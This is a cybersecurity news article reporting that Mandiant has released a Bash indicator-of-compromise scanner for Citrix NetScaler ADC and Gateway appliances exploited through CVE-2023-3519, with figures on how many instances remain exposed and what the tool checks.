News, news analysis, and commentary on the latest trends in cybersecurity technology.
Mandiant Releases Scanner to Identify Compromised NetScaler ADC, Gateway
Mandiant's IoC Scanner will help enterprises collect indicators of compromise on affected Citrix NetScaler products.
With thousands of Citrix networking products vulnerable to a critical vulnerability still unpatched and exposed on the Internet, Mandiant has released a tool to help enterprise defenders identify those that have been compromised.
The IoC Scanner is designed to be used with Citrix ADC and Citrix Gateway version 13.1, Citrix ADC and Citrix Gateway version 13.0, Citrix ADC and Citrix Gateway version 12.1, Citrix ADC, and Citrix Gateway version 12.0.
Citrix issued a patch for the zero-day critical vulnerability (CVE-2023-3519) in its NetScaler application delivery controller and gateway products on July 18, along with a recommendation for organizations using the affected products to apply it immediately. The vuln could be exploited to allow unauthenticated remote code execution. Several threat groups are already actively exploiting the flaw by installing web shells inside of corporate networks and carrying out dozens of exploits.
Researchers say that nearly 7,000 instances remain exposed on the Web. Of those, around 460 have Web shells installed, likely due to compromise.
Mandiant's tool, available on GitHub, can identify the file system paths of known malware, post-exploitation activity in shell history, unexpected crontab entries and processes, and known malicious terms and unexpected modification of NetScaler directories. The standalone Bash script can be run directly on a Citrix ADC appliance to scan files, processes, and ports for known indicators. (The tool must be run as root in live mode on the appliance.) It can also inspect a mounted forensic image to use in an investigation, Mandiant said.
The IoC Scanner will do a "best-effort job" at identifying compromised products, but it may not be able to find all compromised devices or be able to whether the device is vulnerable to exploitation, Mandiant said. "This tool is not guaranteed to find all evidence of compromise, or all evidence of compromise related to CVE 2023-3519," according to the company.
About the Author(s)
You May Also Like
Safeguarding Political Campaigns: Defending Against Mass Phishing Attacks
May 16, 2024Why Effective Asset Management is Critical to Enterprise Cybersecurity
May 21, 2024Finding Your Way on the Path to Zero Trust
May 22, 2024Extending Access Management: Securing Access for all Identities, Devices, and Applications
June 4, 2024Assessing Software Supply Chain Risk
June 6, 2024
Black Hat USA - August 3-8 - Learn More
August 3, 2024Cybersecurity's Hottest New Technologies: What You Need To Know
March 21, 2024